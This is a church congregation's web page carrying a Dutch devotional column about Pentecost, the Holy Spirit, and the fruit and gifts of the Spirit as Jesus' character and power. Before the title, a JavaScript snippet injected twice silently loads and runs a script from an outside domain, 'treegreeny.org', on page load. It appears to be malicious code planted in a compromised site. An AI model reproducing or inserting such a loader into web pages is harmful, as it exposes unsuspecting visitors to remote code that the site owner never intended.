;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Karakter & Kracht - PKN Damwâld

Karakter & Kracht

Gepubliceerd op: vrijdag 2 juni 2023

Zo, de pinksterfestiviteiten zijn weer voorbij. We hadden ruim keus naar welk soort pinksterfestival we wilden gaan. Zo was Opwekking voor het eerst sinds zijn bestaan helemaal uitverkocht. Dat betekent dat de 53e editie ongeveer 60.000 mensen trok en dat de livestream werd bekeken door 330.000 mensen. Maar het Pinksterfeest in Veenklooster kon je ook heen of naar Pinksterfeest 316 of Pinkstervuur of … Genoeg keuze dus. Of met 10 duizenden bij elkaar, duizenden of honderden. Voor ieder iets, voor elke leeftijd en elke kerkelijke stroming. Maar als deze vervulling van Gods Heilige Geest nou eens niet alleen voor 1 weekend zou zijn, waarin we natuurlijk helemaal open staan voor dat vuur, maar dat het iets zou zijn van elke dag. Dat zou wat teweegbrengen? De Geest brengt dunamis, een Grieks woord dat kracht betekent (let op de Nederlandse versie: Dynamiet). We worden vervuld/ gevuld met de Heilige Geest, althans dat is het aanbod van Jezus. Er worden 2 woorden gebruikt in handelingen 1 voor deze vervulling. De een betekent dat we van binnen worden vervuld en de ander betekent dat we van buiten worden vervuld. Deze 2e kan je zo vertalen dat we van buiten in staat worden gesteld om datgene van de Geest te kunnen doen. Hij wil ons kracht geven aan de binnenkant en aan de buitenkant. Als we over de Heilige Geest spreken, komen we snel op 2 termen: Gaven van de Geest en de Vrucht van de Geest. In het volgende kerkelijk seizoen hoop ik hier een aantal avonden over te houden, over de Heilige Geest als de ‘onbekende 3e’. Zonder nu te veel te zeggen hierover kan je heel simpel zeggen dat de vrucht van de Heilige Geest het karakter van Jezus is die in ons is. Je kan ook simpel zeggen dat de gaven van de Heilige Geest de kracht van Jezus is die ook in ons en door ons heen wil werken. Eigenlijk zei Jezus tegen zijn discipelen toen en nu: Ik ga weg, maar de Heilige Geest komt en zal jullie in staat stellen om mij te laten zien in kracht en in karakter. Niet iets wat je doet door zelf ontzettend je best te doen, de juiste theologietjes aan te hangen of het organisatorisch te laten kloppen. Nee, het is eigenlijk zoals Jezus zei: Wacht, totdat je weet dat je van boven bent bekleed. Dat je gevuld bent, en dat je dit kan uitdelen. Hij wil aan ons Zijn hart bekendmaken, en door ons heen aan anderen. De Heilige Geest is zo echt en we hebben Hem zo nodig. Dat we ons elke dag mogen laten vullen, zodat wij steeds meer op Jezus gaan lijken (karakter) en mogen doen, de dingen die Jezus deed (kracht).

Columnist:Robert Colijn

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns